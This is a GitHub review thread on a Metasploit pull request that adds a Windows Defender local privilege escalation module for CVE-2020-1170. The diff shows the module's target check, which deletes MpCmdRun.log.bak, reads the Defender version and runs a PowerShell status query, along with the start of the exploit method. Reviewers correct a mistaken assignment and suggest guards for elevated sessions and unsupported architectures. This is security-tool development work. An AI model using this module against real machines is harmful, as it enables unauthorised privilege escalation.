modules/exploits/windows/local/cve_2020_1170_windows_defender_lpe.rb

```diff
@@ -0,0 +1,342 @@
+    end
+
+    # Check if C:\Windows\Temp\MpCmdRun.log.bak exists and if so, if we can delete it. If it exists and we
+    # can't delete it, then we can't exploit this vulnerability.
+    backup_file_exists = session.railgun.kernel32.GetFileAttributesA("C:\\Windows\\Temp\\MpCmdRun.log.bak")['ErrorMessage']
+    vprint_status("#{backup_file_exists}")
+    if backup_file_exists =~ /[Aa]ccess is denied/
+      print_error("Current user doesn't have access to C:\\Windows\\Temp\\MpCmdRun.log.bak! We cannot exploit this target until this file is deleted!")
+      return CheckCode::Safe
+    elsif backup_file_exists =~ /operation completed successfully/ # Aka the file exists
+      remove_file_result = session.railgun.kernel32.DeleteFileA('C:\\Windows\\Temp\\MpCmdRun.log.bak')['ErrorMessage']
+      vprint_status("#{remove_file_result}")
+      if (remove_file_result =~ /[Aa]ccess is denied/)
+        print_error('The file C:\\Windows\\Temp\\MpCmdRun.log.bak could be read but could not be deleted. We cannot proceed without deleting this file. Exiting!')
+        return CheckCode::Safe
+      end
+      print_good('C:\\Windows\\Temp\\MpCmdRun.log.bak existed on the target but we successfully removed it!')
+    else
+      vprint_good("C:\\Windows\\Temp\\MpCmdRun.log.bak doesn't exist on the target!")
+    end
+
+    mprun_file_version = file_version('C:\\Program Files\\Windows Defender\\MpCmdRun.exe')
+    mprun_file_version.pop # Remove last element, the branch. We aren't interested in it.
+    gem_version_mpfile = Gem::Version.new(mprun_file_version.join('.')) # Taken from https://stackoverflow.com/questions/4018689/ruby-combining-an-array-into-one-string
+    print_status("Version #{gem_version_mpfile} of MpCmdRun.exe detected on target!")
+
+    # Old check for the patched version of Windows Defender. Commented out as there was a patch bypass.
+    # if gem_version_mpfile >= Gem::Version.new('4.18.2005.1')
+    #  return CheckCode::Safe
+    # end
+
+    opts[:code] = 'powershell -c "Get-MpComputerStatus"'
+    mpcomputerstatus_result = client.powershell.execute_string(opts)
+
+    if mpcomputerstatus_result =~ /800106BA/ # Error code 0x800106BA occurs when another security product is installed according
+      # to https://answers.microsoft.com/en-us/windows/forum/windows_vista-security/windows-defender-error-0x800106ba/0e2f4e98-4e5f-4991-8994-0f8c80784547
+      print_error('The target has an outdated version of MpCmdRun.exe installed but they have another AV installed.')
+      return CheckCode::Safe
+    end
+
+    vprint_good('Target appears to have an outdated version of MpCmdRun.exe that is being actively used.')
+    return CheckCode::Appears
+  end
+
+  def exploit
+    unless session.arch = 'x64'
+      print_error('Session is not compatible with this module, as we presently only support exploiting x64 machines. Please try this module against a x64 machine!')
```

Comment:
The unless here should be a comparison operator not an assignment (`==` not `=`). Also the verbiage saying that it's only for exploiting x64 machines doesn't quite capture that you should also be failing when operating on an x86 session on an x64 machine.

Usually the `exploit` method of an LPE like this would use a preamble similar to:
```suggestion
    if is_system?
      fail_with(Failure::None, 'Session is already elevated')
    end

    if sysinfo['Architecture'] =~ /wow64/i
      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported (only x64 is supported)')
    elsif sysinfo['Architecture'] == ARCH_X86
      fail_with(Failure::NoTarget, 'Running against x86 is not supported (only x64 is supported)')
    end
```

Also note the use of `fail_with(Failure::NoTarget` in there.

Reply:
@gwillcox-r7 it looks like you fixed the logic error, but missed the `Failure::NoTarget` and verbiage correction. Also the check to see if the session is already running as system would be a good idea, especially since this is not entirely clean and in memory.

Reply:
Thanks sorry for some reason I didn't see your comments earlier on these issues (guess Github hid them from me?) I'll address them now 👍

Reply:
Applied the rest of your recommended fixes, sorry for the mixup there